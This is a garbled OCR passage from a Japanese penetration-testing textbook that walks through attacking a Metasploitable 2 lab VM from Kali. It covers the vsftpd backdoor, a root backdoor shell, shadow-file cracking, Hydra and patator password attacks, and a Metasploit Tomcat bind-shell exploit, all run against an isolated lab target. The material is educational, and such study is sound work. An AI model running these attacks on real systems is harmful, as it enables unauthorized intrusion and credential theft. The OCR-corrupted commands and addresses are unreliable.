IP アド レス : 10.0.0.5 (後に Metasploitable 側 で 設定 する ) 





2,Metasploitable に ロク イン する 
仮想 マシ ン を 起動 し て 、 Metasploitable の ログ イン 画面 が 表示 され る こと を 確認 


し ます ( 図 52)。 ID に msfadmin 、 パ スワ リー ド に msfadmin を 人 人 人力 し て ログ イ 


P4 Metasploitable2 [ 室 行 中 | - Oracle VM VirtualBox 


仮想 マシ ツン 表示 入力 
FLiiig dEfEFTEd EXECULiIO ロ nn SCIEdUULEr at 
lnT DETiOodiC Command SChEduler Crond 
In Tnnra] IE† emg1ne= 上 nmCat5. ら 5 
所 lE 本 は ゴ ョ リロ ゴ JE9 Hi ゴン 
ln locaul boot sCY iptS 【 プ ご も と ンド . 1OCn 1 ) 
nohup: appendimg output も t ロ mnhup out" 
jiuiiiWWlll 還 li 中 OHhuD .OUt 


Marnling: HCucFr CxpoSc も this UN tt ロ am un も truls も td 
じ nntaC も L: 前 STUEU[atlnEtaSnln1t .Cnm 


reSi'DS う 1 問 」 は まき. 89IP4E は を ie 本 (は 1 は 生れ 





PIECJZIP IED 51EOGOEW 席 


5-2 Metasploitable の ログ イン 画面 
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③ 日 本 語 キ ー ボ ー ド の レイ アウ ト に 変更 する 

英語 キー ボー ド の レイ アウ ト で ある た め 、 日 本 語 キ ー ボ ー ド を 使っ て いる の で 
あれ ば レイ アウ ト を 変更 し ます (*3)。 た だ し 、 こ の 方 法 で レイ アウ ト を 変更 し た 
場合 、 再 起動 する と 元 の 状態 に 戻り ます 。 





④ 静 的 IP アド レス を 設定 する 
デフ ォ ル ト で は 動 的 に IP アド レス が 割り 振ら れ て し まう の で 、 静 的 IP アド レス 
を 設定 し ます 。 





"/etc/network/interfaces" フ ァイル (編集 前 ) 








"/etc/network/interfaces" フ ァイル (編集 後 ) 





3 : 元 の レイ アウ ト に 戻し た い 場 合 に は 、 次 を 入力 し ます 。 
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設定 を 反映 させ て か ら 、ethO0 の IP アド レス が 10005 に な っ て いる こと を 確認 し 
ます 。 





ホス ト オ ン リー ネッ トワ ー ク の ホス ト OS に Ping が 通る こと を 確認 し ます 。 


⑤)Metasploitable を 終了 する 





以上 で 初期 設定 は 完了 で す 。Metasploitable を 終了 する に は 、 次 の コマ ンド を 人 入 
力 し ます 。 








最後 に "System halted." と 表示 され 、 シ ステ ム は 停止 し ます が 、 自動 的 に 電源 が 
落ち ませ ん 。 仮想 マシ ン の 右上 の [x] ボタ ン を 押し て か ら 「 仮 想 マ シン の 電源 
オフ 」 を 選択 し て 、 電 源 を 落と し ます 4)。 


4 : halt P コ マン ド 、powero 括 コマ ンド を 入力 し て も 電源 が 切れ ませ ん 。 実機 で あれ ば 電源 ボタ 
ン を 長押 し し な けれ ば ぱな ら ず 手間 が か か り ま す が 、 仮想 マシ ン で あれ ば この よう に し て 簡単 に 電 
源 を 落と せま す 。 
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5-2 | WU【a に に 】【y)l に 1)【 に を 各 : 妥 っ 





攻撃 の 基本 的 な 流れ は 次 の 通り で す 。 基 本 的 な 情報 調査 ツー ル を 使い 、 
Metasploitable の 情報 を 収集 し ます 。 脆弱 な サー ビス を 特定 し た ら 、Metasploit の 
モジ ュー ル を 用 いて 侵入 し ます 。 

この 実験 に お ける 環境 は 、 次 の 通り で す 。 


Kali (攻撃 端末 ) 
アダ プター1 (必須 ) 
如 り 当て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.2 ( 静 的 ) 


アダ プター2 (任意 ) 


如 り 当て : NAT 
IP アド レス : 10.0.3.15 ( 動 的 ) 


Metasploitable 2 (ター ゲッ ト 旧 末 ) 
アダ プター1 


有 W 割り 当て : ホス ト オ ン リー アダ プター 


名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.5 ( 静 的 ) 





Metasploitable へ の 難 種 攻撃 を 実行 する 


1 や) ホー トス キャ ン を する 

nmap で ター ゲッ ト を ポー トス キャ ン し ます 。 nmap は 非常 に 高 機能 で あり 、 最 
も 広く 使わ れ て いる ポー トス キャ ナー で す 。 ポ ボー トス キャ ン と は 、 開 いて いる 
ボー ト 番 号 (稼働 し て いる サー ビス ) を 特定 する 攻撃 で す 。 ボ ポート スキ ャ ン を 実 
現す る ツー ル を ボー トス キャ ナー と いい ます 。 

nmap に は だ た くさ ん の オプ ショ ン が 用 意 さ れ て いま す 。-sP オ プシ ョ ン あ る い は 
-sn オ プシ ョ ン を 用 いる と 、Ping ス キャ ン を 実行 し ます 。 す な わ ち 、 ポ ー ト スキ ャ 
ン せ ず に Ping だ け を 実行 し ます 。 こ こ で は 、 ホ スト オン リー アダ プター の ネッ ト 
ワー ク 内 で 稼働 する マシ ン の IP アド レス を 列挙 し ます 。 
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IP アド レス が 10005 の ホス ト が 存在 し ます 。 こ れ は 、 タ ー ゲ ッ ト で ある 
Metasploitable の 端末 で す 。 つ ま り 、Metasploitable に アク セス で きる こと が わか 
り ま す 。 

次 に 、 Metasploitable で 開い て いる ボー ト 番 号 を 調べ ます 。 そ れ と 同時 に サー ビ 
ス の バー ジョ ン と OS の 種類 を 推測 する た め に 、 次 の オプ ショ ン を 用 いま す 。 


-p- : 1 番 か ら 65535 番 まで の ポー ト 番 号 を 対象 と する 。 
-sV : バー ジョ ンス キャ ン 。 各 ポー ト の サー ビス の バー ジョ ン を 検出 する 。 
-0 : フィ ン ガ ー プ リン ト 。 ター ゲッ ト の OS を 特定 する 。 
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検出 され た ポー ト 番 号 の うち 、 特 に 気 に な る も の は 次 の 通り で す 。 


*・ ボー ト 21 : vsftpd 
* ポー ト 1524 : Metasploitable root shell 
・ ポー ト 5900 : VNC 


(②)vsftpd の バッ ク ド ア を 利用 する 

まず は 最初 に 見 つけ た ボー ト 21 の vsftpd を 攻略 し て み ま す 。 

vsftpd 23.4 向 け の Exploit を 探し ます 。 CVE Details (https://wwwr.cvedetails. 
com/) や Exploit-DB (http://exploit-db.com/) で 検索 する と 、「Backdoor Command 
Execution」 と いう 脆弱 性 が ある こと が わか り ま す 。 Exploit-DB の 検索 結果 より 、 
Metasploit に 攻撃 プロ グラ ム が 備わっ て いる こと も わか り ま す ( 図 5-3)。 
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7zo 上 人 @. Expiott Datebass Seprdn 


Search the ExDploit DataDbase 


Seaftli [he DatabD8se 1O「 FxDIOI5。 PaDEfS. ahO0 ShellICOde. Yi hn eVE 和 SEa「(h hy CVE an0d OSVDB Eriers. 


wrtqsauae 人 


mA へ TA 
プラ イル レー ・ 押 本 才 


1 OL3| erTiIeS 


Date マ D A V Title 


2011.07.05 B に ママ VSftpd 2.3.4 - Backdoor Command Execution MetasDloOt 
(MetaSploilU 





5-3 Exploit の 検索 結果 


解説 に よる と 、vsftpd 234 に は リモ ー ト か ら コ マン ド 実 行 を 可能 と する バッ ク 
ドア が 含ま れ て いる よう で す 。 19」 を 含む ユー ザー 名 で FTP に ログ イン する と 、 
ボー ト 6200 に バッ ク ド ア が 開き ます 。 ポ ー ト 6200 (TCP) に アク セス する こと で 、 
vsftpd の 実行 権限 で 任意 の コマ ンド を 実行 で きま す 。 

サー バー に 対す る 初め て の 攻撃 な の で 、 攻撃 の 流れ を 手 作 業 で 検証 し て み ま す 。 
まず 、Metasploitable 上 で ポー ト 6200 (TCP) が 開い て いな いこ と を 確認 し ます 。 
挫 の コマ ンド を 実行 し て も 何 も 出 力 さ れ な い の で 、 開 いて いま せん 。 


msfadmin 人 metasploitab1e :<$ netstat -na | grep 6299 
( 何 も 出力 が な い ) 


次 に Kali か ら Metasploitable の ボ ポート 21 番 に アク セス し ます 。 
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rootQka11:<# nc 19.9.9.5 21 

229 (vsFTPd 2.3.4) 

USER attacker : ) に コピ に を スル - ア も 用 計 全 ェ ル た 
331 Please specfy the password . 


PASS hoge リバ て 本 に ッ ンク エ プ 朋 ビレ ゃ ビン マル K デ くさ 





PASS コ マン ド で パス ワー ド (任意 の 文字 列 ) を 入力 し た 時 点 で 、 Metasploitable 
上 に て ポー ト 6200 (TCP) が 開い た こと を 確認 で きま す 。 


msfadminQmetasplo1tab]e :<$ netstat -na | grep 6299 
tcp 9 9.9.9.9:6299 9.9.9.9:* LISTEN 


Kali で 別 Terminal を 起動 し て 、 ポ ボー ト 6200 に アク セス し ます 。 ア クセ ス せ ず に 
し ば らく 放置 する と 、EFTP ア クセ ス が タイ ム ア ウ ト し ます 。 タ イム アウ ト し て し 
まう と ポー ト 6200 は 閉じ る の で 注意 し て くだ さい 。 


Poot 細 ka11:< 韻 ncC -nv 19.9.9.5 6299 
(UNKNOMN) [19.9.9.5] 6299 (?) open 


whoam ュ プロ ンプ ト は 返っ て こない が コマ ンド を 入力 する 。 


Poo whoami コ マン ド の 出力 結果 が 表示 され る 。 

uname -a 

Linux metasploitab1e 2.6.24-16-server #1 SMP Thu Apr 19 。」 
13 : 58:99 UTC 2998 1686 GNU/Linux 

eX ユ 1 

Poot 條 ka11 : < exit コ マン ド を 実行 する と 、 抜 ける 。 








と ころ で 、 Exploit-DB の 検索 結果 か ら リ ンク を 飛ぶ と 、 Metasploit に 含ま れ て い 
る "vsftpd_234_ backdoorrb ファ イル の ソー スコ ー ド を 確認 で きま す 。 ソ ー ス 
コー ド は Ruby で 記述 され て いま す 。 攻撃 の 流れ を 確認 する だ け で あれ ば 、Ruby 
の 細か い 文 法 を 気 に す る 必要 は あり ませ ん 。 

Metasploit3 ク ラス 内 の exploit メ ソ ッ ド に 注目 し ます 。 次 の コー ド で FTP に ア 
クセ ス し た 後に 、USER コマ ンド で ユー ザー 名 を 指定 し て いま す 。 ラン ダム な ユー 
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ザー 名 の 未 尾 に 「:)」 を 付与 し て いる こと を 確認 で きま す 。 エ ラー が 発生 し な けれ 
ば 、 続 け て PASS コ マン ド で パス ワー ド を 指定 し て いま す 。 





その 後 、 ボ ー ト 6200 に 接続 で きる か どう か を 確認 し ます 。 接続 で きる な ら 、 
handle_backdoor メ ソ ゾ ッ ド を 実行 し ます 。 こ こ で シェ ル を 処理 し て いま す 。 





以上 を 踏ま を て 、Mesploitable の モジ ュー ル ("exploit/unix/ftp/vsftpd_234_ 
backdoor") で vsftpd 2.3.4 を 攻撃 し て み ま す 。 








| 第 5 章 | etasploitable の ハッ キン グ 377 


*※ コマ ンド を 入力 
出力 結果 。 





プロ ンプ ト が 返っ て こない の で 、 操作 性 が よい と は いえ ませ ん CC5)。 し か し な 
が ら 、root 権 限 な の で ほとん どの こと を 実現 で きま す 。 例え ば 、 次 の コマ ンド を 実 
行 す れ ば 、 newuser と いう バッ ク ド ア 用 の アカ ウン ト を 作れ ます 。 た だ し 、 パ ス 
ワー ド は この コマ ンド の 入力 直後 に 指定 し ます 。 





と りあ え ず exit コ マン ド で シェ ル か ら 抜 け ま す 。 例外 が 発生 し て スタ ッ ク ト 
レー ス が 表示 され ます が 、[Enter] キー を 押す と 、msf プ ロン プ ト に 戻り ます 。 さき 
ら に 、exit コ マン ド を 入力 し て 、msf プロ ンプ ト か ら 抜 け ま す 。 


5 : TTY シェ ル に 切り 替え れ ば 、 操 作 性 を 向上 で きま す 。7.2 の 「SSI イ ンジ ェクション に より 
Web シェ ル を 設置 する ] の ステ ッ プ ⑦ を 参照 し て くだ さい 。 
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3③ データ ベー ス を 列挙 する 

ポー ト 3306 が オー プン な の で 、 MySQL が 動作 し て お り 、 ネ ットワーク 経由 で ア 
クセ ス で きま す 。 MySQOL に root ( 空 パ スワ ー ド ) で ログ イン を 試し て 、 デ ー タ 
ベー ス を 列挙 し て み ま す 。 


パス ワー ド の 入力 な し に プロ ンプ ト が 返っ て きた 








| 第 5 章 | etasploitable の ハッ キン グ 379 


ereig まげ も チ , ド が 『 





④) 辞 書式 攻撃 で FTP アカ ウン ト を 解析 する 

FTP の アカ ウン ト を 辞書 式 攻撃 で 解析 し て み ま す 。Kali に は 高 機能 な オン ライ 
ン パ スワ ー ド クラ ッ カ ー の Hydra と xHydra (Hydra の GUI 版 ) が イン スト ー ル さ 
れ て いる の で 、 こ れ ら を 使い ます 。 

まず 、 ユ ー ザ ー リ スト で ある "user.lst' ファ イル と 、 パ スワ ー ド リス ト で ある 
"pass.lst(' フ ァイル を 用 意 し ます 。 
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画 [Ctrl1] 十 [c] キ ー を 押す と 、 抜 ける 





hydra の 工 オ プシ ョ ン で ユー ザー リス トト 、-P オ プシ ョ ン で パス ワー ドリ スト を 
指定 し ます 。-t オ プシ ョ ン で ター ゲッ ト に 対す る 並列 処理 の タス ク 数 を 指定 し ま 
す 。 デ フォ ルト で は 16 で す が 、 こ こ で は 8 に 下げ まし た 。 最 後に ター ゲッ ト 上 端末 
の IP アド レス と 、 サ ービス プロ トコ ル を 指定 し ます 。 
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辞書 式 攻撃 の 結果 、FTP ア カウ ント を 2 つ 解 析 で きま し た 。 


⑤ 辞 書式 攻撃 で SSH アカ ウン ト を 解析 する 

SSH の アカ ウン ト を 辞書 式 攻撃 で 解析 し て み ま す 。 FTP の 辞書 式 攻撃 と 同様 の 
書式 で す が 、 最後 の サー ビス プロ トコ ル の 箇所 を ssh に し ます 。 ま た 、 SSH は 並列 
処理 の タス ク 数 が 大 きい と 稚 告 が 出る の で 、4 に 減ら し て いま す 。 





また 、 次 の よう な 書式 で も 記述 で きま す 。 末尾 が 「service://server[portl[/optl」 
と な っ て いま す 。 





プロ トコ ル の ポー ト 番 号 が 変更 され て いる 場合 、 す な わ ち IANA に 登録 され て 
いる ボー ト 番 号 と ずれ が ある 場合 、 後 者 の 書式 に より 対応 し ます 。 

Hydra の SSH の 解析 が うま く 動 作 し て いれ ば 問題 あり ませ ん 。 し か し 、 環 境 に 
よっ て は SSH 機 能 が 無効 に な っ て お り 、SSH の 解析 が で きま せん 。「[ERRORI 
target ssh://10.0.0.5:22/ does not support password authentication. と いう エラ ー 
が 表示 され れ ば 、 対 応 し て いな いこ と に な り ま す (v86 で 検証 )。 こ れ を 修正 する 
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方 法 は 公式 ペー ジ (6) に 記載 され て いま す が 、 手 間 が か か る の で patator と いう 
ツー ル で 代替 し ます 。 

patator も オン ライ ン パ スワ リー ドク ラッカー の 一 種 で あり 、Kali に イン スト ー ル 
され て いま す 。 解析 する 認証 ど と に モジ ュー ル が 用 意 さ れ て いま す 。 SSH の 場合 
は 、ssh_login モジ ュー ル を 用 いま す 。 

host に は ター ゲッ ト の IP アド レス を 指定 し ます 。 タ ー ゲ ッ ト リ スト が あれ ば 、 
「host=FILEO 0=hosts.lst] の よう に 指定 し ます 。user や password に も 同様 に 指定 
で きま す 。FILEn (リス ト の ファ イル ) だ け で な く 、COMBOn0 や COMBOn1l ( 組 
み 合 わせ ) 、 NETn (IP アド レス の 範囲 )、RANGEn (数 字 や 文字 列 の 範囲 指定 ) な 
ども 使用 で きま す 。 詳細 は ヘル プ を 参照 し て くだ さい 。 


題 強 押 的 に 止め る 。 | 





認証 に 失敗 し た 場合 に は 、mesg 欄 に "Authentication failed." が 表示 され る こと 
が わか り ま す ("7)。 こ の まま 続け て も る 、 ロ グ が 次 々 と 流れ て し まい 読み 取り に く 


*6 : https//github.com/yanhauser-thc/thc-hydra 


7 :SSH の 認証 に 失敗 し た と き の mesg 欄 の メッ セー ジ で あり 、SSH の 応答 メッ セー ジ に こう し た 
メッ セー ジ が 格納 され て いる と いう わけ で は あり ませ ん 。 
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い の で 、 い っ た ん 止め て 、 認 証 に 失敗 し た ログ を フィ ル タ リ ング する こと に し ま 
す 。 

xx オプション を 用 いる と 、patator の 動作 を 指定 で きま す 。「< く < アクション >:< 条 
件 式 >] と いう 書式 で 指定 し ます 。 例 えば 「ignoreumesg='Authentication failed. 」 
と 指定 する こと で 、mseg 欄 が "Authentication failed. の ログ を 出力 し ませ ん 。 つ 
まり 、 認 証 に 成功 し た 場合 し か 表示 され な いこ と に な り ま す 。 


root@⑳ka11:<# patator ssh 1ogin host=19.9.9.5 user=FTLEO .」 

Pas Sword=FTLE1 9=user.1st 1=pass.1st -x 
1gnore:meSg='Authentication failed. " 

19:39:38 patator TINFO - Starting Patator v9.6 | 

( http : / / code . google . Com/p/patator/ ) at 2918-97-13 19:39 JST 

19: 39:38 patatOr TNFO - 

19:39:38 patator TINFO - code size time | candidate | 

| num | mesg 

19: 39:38 patatoh 。 TINFO - -----------ー-ーーーーーーーーーーーーーーーーーーーーーーーーーー ご 
19:49: の 92 patator TNFO - 9 37 19.151 | sys:batman | 

| 16 | SSH-2.9-OpenSSH_4.7p1 Debian-8ubuntu1 

19:49:14 patator TINFO - 9 37 19.134 | msfadmin:msfadmin | 
| 22 | SSH-2.9-0penSSH_4.7p1 Debian-8ubuntu1 

19:49:23 patator TINFO - 9 37 19.139 | user:user | 

| 37 | SSH-2 .9-OpenSSH_4.7p1 Debian-8ubuntu1 

19:41:95 patator TINFO - Hits/Done/Skip/Fai1/Size: 
3/63/9/9/63, AVg: 9 r/s, Time: 9h 1m 26s 


な お 、|patator -h] や 「man patator」 と 入力 する と 、 モ ジュ ー ル の 説明 だ けが 
表示 され ます 。 各 モジ ュー ル で 使用 で きる オプ ショ ン を 調べ る 場合 に は 、「patator 
く < モジ ュー ル 名 > -help」 と 入力 し ます 。 

patator の 出力 に よる と 、3 つ の SSH ア カウ ント を 解析 で きま し た 。 


6 TCP の バッ ク ド ア を 利用 する 
ボー ト 1524 (TCP) の [Metasploitable root shelll は か な り 怪 し いと いえ ます 。 
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名 前 か ら 誰 か に すでに 侵入 され て お り 、 バ ッ ク ド ア (ルー ト 権 限 の シェ ル ) が 設 
置 さ れ て いる と 推測 で きま す 。 

nmap で サー ビス 名 を 確認 する と 、 ingreslock と いう サー ビス 名 に な っ て いま 
す 。 





どの よう な タイ プ の バッ ク ド ア か わか ら な い の で 、 と りあ え ず Netcat で 接続 し 
て み ま す 。 す る と 、 次 の 出力 の よう に いき な り root の プロ ンプ ト が 返っ て きま し 
た 。 id コマ ンド や uname コマ ンド を 実行 する と 、 ど う や ら root 権 限 の シェ ル の よ 
う で す 。 





結果 的 に 、 誰 か が 設置 し た バッ ク ドア を 流用 し て 侵入 で き て し まい まし た 。 
"etc/shadow" ファ イル の うち 、root と msfadmin ユ ー ザ ー の 行 だ け を 抽出 し ま 
す 。 
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この 2 行 を コピ ー 交 ペー スト し て 、Kali 側 に "passwords"” ファ イル を 作り ます 。 


"passwords" フ ァイル 





]John the Ripper を 使っ て パス ワー ド を 解析 し ます 。 通常 は 先 に 辞書 ファ イル を 
使っ て 解析 し ます が 、 こ こ で は 総 当 た り 攻 撃 で 解析 し て み ま す 。 





[Space] キー を 押す と 途中 経過 を 表示 し ます 。 右 に 現在 試し て いる パス ワー ド 
候補 が 表示 され ます 。 

[Ctrl] + [c] キー で 中 断 で きま す 。 レ ジュ ー ム 機能 が ある の で 、 再 実行 する と 
解析 の 途中 か ら 始 まり ます 。 レ ジュ ー ム する 際 に は 、 次 の よう に -restore オ プ 
ショ ン を 指定 し ます 。 





7 Hydra で HTTP の 認証 を 解析 する 
Kali 側 で Firefox を 起動 し て 、URL 欄 に http://10.0.0.5:8180 と 入力 し ます 。 す る 
と 、Tomcat の 画面 が 表示 され ます ( 図 54)。 
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Apache Tomca/5.5 - Moglla Firefox 
J 国 Apsche TomcaU5.5 xi 二 
を ①|10005.818C = Search 立 打 # 合 
記 Most Visited マ 馬 Offensive Securlby KallUnux Kal Docs Kall Tools Explolt-DB 区 Aircradk-ng 





寺 。 httD://www.aDache.Oor ロ / 


上 Apache 
の ec The Apache Software Foundation 


『 you're Seeinq thIS Dage Via a Weeb browSserf。 it BanS YOU'Ve SetuD 
Tomcat suCCessfuly. Condqratulations! 


StatuS 
Tomcat Adminisration As youl may have gueSSed hy now. his IS (he default Tomcal home pade. Il 
Tomcat Manager Can bo found on the IOcal lesystom at 


SCATALINA_HONE/webappS/RO0T/1ndex . 1Sp 


where "$CATALINA_HOWME" ls he root of he Tomcat inslalaon drectory. If 
YOU'「E SeGIng 了 I5 De, anH You donTtthink you should be. hen iBT YOU IE 
hef 8 USef WhO haS arriVed ala ISHMIQBO「i Of TOrmCaL Of VOUTe an 
adminiSator who hasntqot his/her seluD quile right Pioviind he laller IS he 
Cas@, DIGaSe 「gior 1O (he Tomcat Documentaton fOr mofe dotallod setUD and 
adminisraton infoimaton han is found In he INSTALL fe. 


NOTE: This Dae iS Decomhlled, ll you change it IS DaG Wi nO4 ChanidB 
sihCBg ItWinS COfTniled Into a sefviletat bulld WIme. (See SCATALIMA HONE/webanps 
/ROOT/WES_ IMF/mob ml BS IO hOM II WaAS faDDed.) 


NOTE: For seCurlty reasonsS。 USIng (he administration webapp Is 
restricted tO uSers Wh role "admin". The manageor vuebapD IS restricted 
tO usSerS with role "manager". Use(s are defihed in $CATALINA HOWE/conf 
/tomCat - 』SeFS yl, 





Cluried with t ミ = am hnsi nf snmnle Seryle=ls and 1 ご F 


5-4 Tomcat の 画面 


左 の メニ ュー の | Administration」 の |Tomcat Administration」 の リン ク を 押 
し ます 。 す る と 認証 画面 が 表示 され ます ( 図 55)。 


Tomcat Server AdmilnstraUion - Morila Hrefox 人 ⑮ 合 
/ | Tomcat SemwerAdmn- X | キ 


を 〇 ① 后 100053180adma』 胃 Q Searrh 邊 # 合 吐 
Ph Moct Vidted マ 前 Offenslve SecurtY WMKI Un WMKaM Docs WKai Toos * Export-DB 電 Arcrark-n 還 


WI ト 3 すり 、 
| り U 1 


Usei Na 





図 5.5 Tomcat の 管理 の た め の 認 証 画面 
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Wireshark を 起動 し て 、 わ ざと 認証 に 失敗 する 間 だ け パ ケッ トキ ャ プチ ャ し ま 
す ("8)。 ここ で は ID に "hoge"、 パ スワ ー ド に "1234" を 入力 し まし た 。 キ ャ プチ ャ 
し た 内 容 に 対し て 、「Follow HTTP Stream」 を 実行 する と 、 次 の よう な HTTP 要 
求 を 送信 し て いる こと が わか り ま す 。 





ここ か ら 、 Hydra に 設定 する 情報 が 得 ら れ ま す 。 た だ し 、-s オ プシ ョ ン で ポー ト 
番号 の 8180 を 指定 し な いと 、80 番 と し て 解釈 され る の で 注意 し て くだ さい 。 


*・ 対象 ホ スト : 10.005 

* 認証 ペー ジ : /admin/jsecurity_check" 

・ デ ー タ の 送信 方 式 : POST メソ ッ ド 演 http-form-post を 使用 する 
* ユー ザー 名 の 変数 : jusername 

* パス ワー ド の 変数 : j password 


8 : Wireshark は パケ ッ ト を キャ プチ ャ する ソフ トウ ェ ア で す 。 詳細 は 第 6 章 を 参照 し て くだ さ 
い 。 な お 、 こ こ で は HTTP 通 信 に 注目 し て いる の で 、Burp な ど で 監 視 し て も よい で し ょ う 。 
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また 、HTTP の 認証 で は 、 た び た び 認証 失敗 時 の メッ セー ジ を 指定 する 必要 が 
あり ます 。 こ れ に つい て 考察 し ます 。 

認証 前 提 の プロ トコ ル で あれ ば 、 認証 の 成否 の 応答 は 仕様 で 決め られ て いま す 。 
つま り 、 プ ロト コル の 仕様 に より 、 プ ログ ラム は 認証 の 成 和合 を 判定 で きま す 。 例 
えば 、 ス テッ プ ⑤ に お ける patator の SSH ア カウ ント の 解析 な ど が 挙げ られ ます 。 
patator の 解析 時 に エエ ラー メッセー ジ を 指定 し まし た が 、 こ れ は 出力 の フィ ル タ リ 
ング で あり 、 認 証 の 成 合 の 判定 の た めで は あり ませ ん 。 

一 方 、HTTP は そう は いき ませ ん 。HTTP の 性 質 上 、 認 証 の 成否 は その 後に 表 
示さ れる 画面 内 容 、 す な わ ち HTTP 応 答 の 内 容 で 判断 し な けれ ば な り ま せん 。 パ 
スワ ー ド は わか ら な い の で 、 認証 に 成功 し た と き の 画 面 内 容 は 知り ませ ん 。 一 方 、 
わざ と 認証 に 失敗 すれ ば 、 和 失敗 し た と き の 画 面 内 容 は わか り ま す 。 し か し な が ら 、 
認証 失敗 の 画面 は 、 Web ア プリ に よっ て 様々 で す 。 今回 の ペー ジ で は Invalid 
username or Dassword'" と いう メッ セー ジ を 含み ます が 、 他 の Web サ イト で は 別 
の メッ セー ジ が 表示 され る こと で し ょ う 。 その た め 、hydra で HTTP の 認証 を 解析 
する と き は 、 認 証 に 失敗 し た と き の メ ッ セ ー ジ を 指定 する 必要 が あり ます 。 こ こ 
で は "Invalid と いう 文字 列 だ け を 指定 し ます (認証 成功 時 に この 文字 列 が 表示 さ 
れる と は 考え に くい た め )。 

具体 的 な Hydra の コマ ンド は 、 次 の 通り で す 。 http-post-form 部 の 書式 は 、 
「http-post-form "< 認証 ペー ジ の パス >:< 送 信 パ ラメ ー タ >:< 認 証 失 敗 時 に 表示 さ 
れる 文字 列 >']」 に な り ま す 。 
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[DATA] attacking http-post-form: //19.9.9.5:8189//admin/] | 


security check:] username=^USER^&] password=^PASS^ : Tnva1id | 
USePrname Or DaSsSwOrd 


[8189] [http-post-form] host: 19.9.9.5 1ogin: tomcat  .」 
DasSsword: 上 omca 

1 of 1 target successfully completed, 1 valid password found 
Hydra (http : //www .thc .org/thc -hydra) finished at 2918-97-14 。」 
22:14:48 


出力 に よる と ユー ザー 名 が tomcat 、 パ スワ ー ド が tomcat と いう アカ ウン ト 
が ある こと が 判明 し まし た 。 認証 画面 に 入力 し て み ま す 。 す る と 、 管 理 画面 が 表 
示さ れ ま し た ( 図 56)。 


Tomcat Server Administration - Mozilla Firefox る 6@ 合 


[| Tomcat seer Admim-。 x ! 二 


を (⑪ | 10.0.0.5.8180'admryframcscLisp C へ Scarch 立 白 # 人 馬 ウ 
肌 Most Vsited マ 開 Cffensive Secunty WMKal ni MKal Docs WKall Tools Explok-DB 箇 Alrcrack-nqg 


ag と 『 Crnirrn 


員 DMINISTRATION 100L 


を 訪 Sews (CaraWmi) 


$ Rasouroes 
記 pa soures 
回 ai sessions Nm 
Sr Enuroamerr Enrnes 
は Uicqr Diahaspcs に 

6 Gus pemmon に 回 用 | )000 の 0 の へ べべ 
人 aen | MM | WW 
6 roups 
演 Roles 





User FulI Name 





5-6 Tomcat の 管理 画面 


この 画面 か ら ユ ー ザ ー の 追加 ・ 削 除 ・ 編 集 や 、 デ ー タ ベー ス の 設定 な ど が で き 
ます 。 

管理 用 の アカ ウン ト の ユー ザー 名 と パス ワー ド が わか れ ば 、Metasploit に 用 意 
され た モジ ュー ル (exploit/multi/http/tomcat_mgr_upload ) を 用 いて シェ ル を 
奪取 で きる こと が 知ら れ て いま す 。 こ れ を 試し て み ま す 。 


アニ 
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FootMKa11 :<# msfconsole 

( 略 ) 
mS 和 † > greD exXplo1t search tomcat 

( 略 ) 

excel1lent Apache Tomcat Manager App1ication Deployer 
Authenticated Code Execution 
eXDlo1t/mult1/http/tomcat mgn upload ー 

2999 - 11 -99 ( 略 ) 
mS† > uSe exXDlO1t/multi/http/tomcat mgr upload 
mSf explo1t( multi/http/tomcat mgr upload) > show targets 


Explo1t targets : 


Td Name 
Java Universal 
Mindows Universa1 
Linux x86 


mmS 和 † exp1o1t( multi/http/ て omcat mgr _ upload) > set target 2 

target => 2 

msf exploit(multi/http/tomcat_mgr_upload) > set pay1oad 1inux/x86/-」 
shel] bind tcp バイ ンド シェ ル が Tomcat に デプロイ され る 。 

payload => 1inux/x86/shel11 bind tcp 

mmS 和 † exploit( mult1/http/tomcat _mgr_upload) > set HttpUsername tomcat 
USernamme => て OmmCcat 

mS 和 † expDloit( mult1/http/tomcat mgn_upload) > set HttpPassword tomcat 
DasSword => tomcat 

mS 和 † exDl1o1t( mult1/http/t て tomcat _mgr_upload) > set RHOST 19.9.9.5 

RHOST => 19.9.9.5 ター ゲッ ト 敵 末 の rp アド レス 。 
mmS 和 † exp1o1t( multi/http/tomcat mgnr_upload) > set RPORT 8189 

RPORT => 8189 ター ゲッ ト サ ー ビ ス の ポー ト 番 号 。 
mSf explo1t( multi/http/tomcat mgr_upload) > show options 
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msf exploit(multi/http/tomcat mgr upload) > exploit 


[*] Started bind handler 

[*] Retrieving session ID and CSRF token. . . 

[*] Uploading and deploying 3Mf9Zz . . . 

[*] Executing 3Mf9Zz . . . 

[*] Undeploying 3Mf9Zz ... 

[*] Command she11 session 1 opened (19.9.9.2:46161 -> 
19.9.9.5:4444 ) at 2918-97-14 23:15:31 +9999 


whoami 権限 を 確認 。 
tomcat55 一 語 MoE3r エ 糧 


Uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 19 13:58:99 」 
UTC 2998 1686 GNU/Linux 


tomcat55 権 限 で シェ ル を 操作 で きる よう に な り ま し た 。 


⑧ ディ レク トリ トラ バー サル を 実現 する 

ステ ッ プ ゆ ① の ポー トス キャ ン の 結果 より 、Metasploitable で は Samba が 稼働 し 
て お り 、 共 有 サ ービス を 提供 し て いる こと が わか り ま す 。 smbclient コ マン ド で 
Samba サ ービス に アク セス し ます 。 そ の 際 、 接続 先 は |// く ター ゲッ ト の ホス ト 名 
>」 で 指定 し ます 。-L オ プシ ョ ン で 共有 名 を 列挙 で きま す 。 


root 細 ka11:<# smbclient -L //19.9.9.5 
MARNTNG: The "syslog" option 1s deprecated 


Enter MORKGROUP\root"s password: 何 も 入 力 せ ず に [ Enter ] キ ー を 押す 。 
Anonymous log1n success†u1 そく = レル ピス の 


Sharename Type Comment 
DP1nt$ Disk Printer Drivers 
tmp Disk oh noes! 注目 。 
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共有 名 tnp の コメ ント が か な り 人 怪し いと いえ ます 。 こ れ を 攻撃 対象 に し ます 。 

Samba に は 、 共 有 フ ォ ル ダー 外 へ の シン ボリ ッ ク リ ンク に つい て 設定 項目 が あ 
り ま す 。 こ の 項目 は 、"smb.conf' ファ イル の 「wide links」 で 設定 で きま す (yes 
の 場合 、 有 効 )。 最近 の Samba は 、 セ キュ リティ の 観点 か ら no に 設定 され て いま 
す (⑨) 。 例 えば 、 共 有 フ ォ ル ダー か ら パ ー ミ ッ シ ョ ン が 777 の ファ イル に シン ボ 
